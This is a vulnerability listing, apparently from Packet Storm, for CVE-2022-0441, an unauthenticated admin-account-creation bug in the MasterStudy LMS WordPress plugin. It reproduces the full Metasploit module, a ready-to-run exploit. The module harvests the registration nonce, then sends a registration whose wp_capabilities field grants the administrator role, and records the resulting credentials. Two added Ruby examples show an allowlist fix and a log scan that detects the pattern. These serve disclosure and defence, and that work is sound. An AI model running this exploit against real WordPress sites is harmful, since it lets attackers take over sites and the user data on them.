Wordpress MasterStudy Admin Account Creation

Published: 31 Aug 2024 00:00:00. Reported by h00die, numan turle, metasploit.com. Type: packetstorm. Source: packetstormsecurity.com. 181 views.

The Wordpress MasterStudy Admin Account Creation vulnerability allows an unauthenticated user to create an administrator account. A Metasploit module is available.
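The root cause the module's payload exposes is a registration handler that writes caller-supplied profile fields, wp_capabilities included, to user meta. The Ruby below is added here as an illustration and is not code from the Vulners page, the Metasploit module or the MasterStudy plugin (whose fix is in PHP and not reproduced). It models the corrective pattern: an allowlist of profile fields, rejection of any key that targets WordPress capability or user-level meta, and a role chosen by server-side policy only. The field names come from the module's JSON; the allowlist contents and the `subscriber` default are assumptions.

```ruby
# Added example (not part of the Vulners page, the Metasploit module or the
# MasterStudy plugin): how a self-registration handler should treat
# caller-supplied profile fields. Key names mirror the module's JSON payload;
# the allowlist and the default role are assumptions for illustration.
require 'json'

# Meta keys that must never be settable by the registering user. WordPress
# stores roles in "<prefix>capabilities" and the legacy level in
# "<prefix>user_level", so match on the suffix to cover custom prefixes.
PROTECTED_META_SUFFIXES = %w[capabilities user_level].freeze

# Fields a self-registration form is allowed to populate (assumed list).
ALLOWED_PROFILE_FIELDS = %w[degree expertize auditory additional].freeze

def protected_meta_key?(key)
  PROTECTED_META_SUFFIXES.any? { |suffix| key.to_s.end_with?(suffix) }
end

# Returns [safe_fields, rejected_keys]. Anything not on the allowlist, or
# that targets a protected meta key, is dropped rather than written.
def sanitize_profile_fields(fields)
  safe = {}
  rejected = []
  (fields || {}).each do |key, value|
    if protected_meta_key?(key) || !ALLOWED_PROFILE_FIELDS.include?(key)
      rejected << key
    else
      safe[key] = value
    end
  end
  [safe, rejected]
end

# The role comes from server-side policy only. 'become_instructor' is a
# pending request for an admin to approve, not an assignment, so every
# self-registration gets the default role.
def role_for_registration(_payload)
  'subscriber'
end

# Processes a registration body and returns the user record that would be
# created. Password hashing is omitted; the point is that no role is ever
# read from the request.
def handle_registration(json_body)
  payload = JSON.parse(json_body)
  safe_fields, rejected = sanitize_profile_fields(payload['profile_default_fields_for_register'])
  {
    'user_login' => payload['user_login'],
    'user_email' => payload['user_email'],
    'role' => role_for_registration(payload),
    'meta' => safe_fields,
    'rejected_fields' => rejected
  }
end

# Constructed request body in the shape the module sends, plus one
# legitimate profile field ('degree') to show the allowlist passing it.
EXPLOIT_STYLE_BODY = JSON.generate(
  'user_login' => 'newuser',
  'user_email' => 'newuser@example.invalid',
  'user_password' => 'x',
  'user_password_re' => 'x',
  'become_instructor' => '',
  'profile_default_fields_for_register' => {
    'degree' => 'BSc',
    'wp_capabilities' => { 'value' => { 'administrator' => 1 } },
    'wp_user_level' => { 'value' => 10 }
  }
)

if __FILE__ == $PROGRAM_NAME
  puts JSON.pretty_generate(handle_registration(EXPLOIT_STYLE_BODY))
end
```

Running it shows the record created with role `subscriber`, `degree` kept, and both capability-related keys listed under `rejected_fields`; the rejected list is worth logging, since a request carrying `wp_capabilities` is itself a signal.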

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress MasterStudy Admin Account Creation',
        'Description' => %q{
          MasterStudy LMS, a WordPress plugin,
          prior to 2.7.6 is affected by a privilege escalation where an unauthenticated
          user is able to create an administrator account for wordpress itself.
        },
        'Author' => [
          'h00die', # msf module
          'Numan Türle', # edb
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-0441'],
          ['URL', 'https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6'],
          ['EDB', '50752'],
          ['WPVDB', '173c2efe-ee9c-4539-852f-c242b4f728ed']
        ],
        'DisclosureDate' => '2022-02-18',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )
    register_options(
      [
        OptString.new('USERNAME', [false, 'Username to register (blank will auto generate)', '']),
        OptString.new('PASSWORD', [false, 'Password (blank will auto generate)', '']),
        OptString.new('EMAIL', [false, 'Email to register (blank will auto generate)', ''])
      ]
    )
  end

  def check
    unless wordpress_and_online?
      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
    end

    # Version is read from the plugin's readme; anything below 2.7.6 is reported vulnerable
    checkcode = check_plugin_version_from_readme('masterstudy-lms-learning-management-system', '2.7.6')
    if checkcode == Msf::Exploit::CheckCode::Safe
      return Msf::Exploit::CheckCode::Safe('MasterStudy LMS version not vulnerable')
    end

    checkcode
  end

  def get_username
    datastore['USERNAME'].blank? ? Faker::Internet.username : datastore['USERNAME']
  end

  def get_password
    datastore['PASSWORD'].blank? ? Rex::Text.rand_password : datastore['PASSWORD']
  end

  def get_email
    datastore['EMAIL'].blank? ? Faker::Internet.email : datastore['EMAIL']
  end

  def run
    username = get_username
    password = get_password
    email = get_email
    # The registration nonce is embedded in the landing page; the named capture
    # in the regex literal assigns the local variable `nonce`
    res = send_request_cgi('uri' => normalize_uri(target_uri.path))
    fail_with(Failure::Unreachable, 'Connection failed') unless res
    fail_with(Failure::UnexpectedReply, 'Request failed to return a successful response') unless res.code == 200
    /"stm_lms_register":"(?<nonce>\w{10})"/ =~ res.body
    fail_with(Failure::UnexpectedReply, 'Unable to retrieve MasterStudy Nonce from page') if nonce.nil?

    print_status("Attempting with username: #{username} password: #{password} email: #{email}")
    # The vulnerable handler writes profile_default_fields_for_register straight to
    # user meta, so wp_capabilities supplied here becomes the new user's role
    json_post_data = JSON.pretty_generate({
      'user_login' => username,
      'user_email' => email,
      'user_password' => password,
      'user_password_re' => password,
      'become_instructor' => '',
      'privacy_policy' => true,
      'degree' => '',
      'expertize' => '',
      'auditory' => '',
      'additional' => [],
      'additional_instructors' => [],
      'profile_default_fields_for_register' => {
        'wp_capabilities' => {
          'value' => { 'administrator' => 1 }
        }
      }
    })
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'ctype' => 'application/json',
      'vars_get' => {
        'action' => 'stm_lms_register',
        'nonce' => nonce
      },
      'data' => json_post_data
    )
    fail_with(Failure::Unreachable, 'Connection failed') unless res
    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
    results = res.get_json_document
    if results['status'] == 'success'
      print_good('Account Created Successfully')
      create_credential({
        workspace_id: myworkspace_id,
        origin_type: :service,
        module_fullname: fullname,
        username: username,
        private_type: :password,
        private_data: password,
        service_name: 'Wordpress',
        address: datastore['RHOST'],
        port: datastore['RPORT'],
        protocol: 'tcp',
        status: Metasploit::Model::Login::Status::UNTRIED
      })
    else
      print_error("Account Creation Failed: #{results['message']}")
    end
  end
end
```
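The module's Notes mark IOC_IN_LOGS, and its run method leaves a distinctive sequence in a web server access log: a GET of the site to harvest the nonce, then a POST to wp-admin/admin-ajax.php with action=stm_lms_register and the nonce in the query string (the JSON body is not logged, but the action and nonce parameters are). The Ruby below is an added defender-side example, not code from the Vulners page or the module: it parses constructed combined-format access log lines and reports each such POST with context. The readme.txt probe it also looks for is what Metasploit's check_plugin_version_from_readme fetches for the plugin slug named in the module; that is an assumption about the helper, not something the page states.

```ruby
# Added example (not part of the Vulners page or the Metasploit module): a log
# review script that flags the request pattern the module produces. The log
# lines are constructed, in Apache/nginx combined format.
require 'time'
require 'uri'

LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+/

# Plugin slug from the module's check method. Its readme.txt is what
# check_plugin_version_from_readme fetches (assumption about the Metasploit
# helper's behaviour, not stated on the page).
PLUGIN_SLUG = 'masterstudy-lms-learning-management-system'

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  uri = URI.parse(m[:path])
  query = uri.query ? URI.decode_www_form(uri.query).to_h : {}
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: uri.path, query: query, status: m[:status].to_i }
end

# One finding per registration POST through admin-ajax.php, with context:
# did the same client fetch the plugin readme (version check) or a page
# (nonce harvest) in the preceding window, and what status came back.
def find_registration_attempts(lines, window_seconds: 300)
  events = lines.map { |l| parse_line(l) }.compact
  events.filter_map do |ev|
    next unless ev[:method] == 'POST' && ev[:path].end_with?('/wp-admin/admin-ajax.php')
    next unless ev[:query]['action'] == 'stm_lms_register'

    prior = events.select do |e|
      e[:ip] == ev[:ip] && e[:time] < ev[:time] && ev[:time] - e[:time] <= window_seconds
    end
    {
      ip: ev[:ip], time: ev[:time].iso8601, status: ev[:status],
      nonce_in_url: ev[:query].key?('nonce'),
      readme_probe: prior.any? { |e| e[:path].include?("/plugins/#{PLUGIN_SLUG}/readme.txt") },
      page_fetch: prior.any? { |e| e[:method] == 'GET' && e[:path] !~ /\.(css|js|png|jpg|txt)\z/ }
    }
  end
end

# Constructed sample: one full check-then-register sequence from 203.0.113.7,
# an unrelated heartbeat POST, and a lone rejected attempt from 198.51.100.9.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [18/Feb/2022:10:00:01 +0000] "GET /wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [18/Feb/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
  203.0.113.7 - - [18/Feb/2022:10:00:03 +0000] "POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=0123456789 HTTP/1.1" 200 44 "-" "Mozilla/5.0"
  198.51.100.4 - - [18/Feb/2022:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"
  198.51.100.9 - - [18/Feb/2022:11:00:00 +0000] "POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=abcdefghij HTTP/1.1" 403 20 "-" "curl/7.81"
LOG

if __FILE__ == $PROGRAM_NAME
  find_registration_attempts(SAMPLE_LOG.lines).each { |f| puts f.inspect }
end
```

Legitimate self-registrations use the same action, so a hit is a lead rather than proof: correlate it with the role of any user created at that time (the payload sets administrator) and with the readme probe and a 200 response, which raise its priority. On the sample, the first finding carries both context flags and a 200; the second has neither and was rejected.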


Scores as of 31 Aug 2024 00:00 (current):
Vulners AI Score: 7.4 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.81347
Views: 181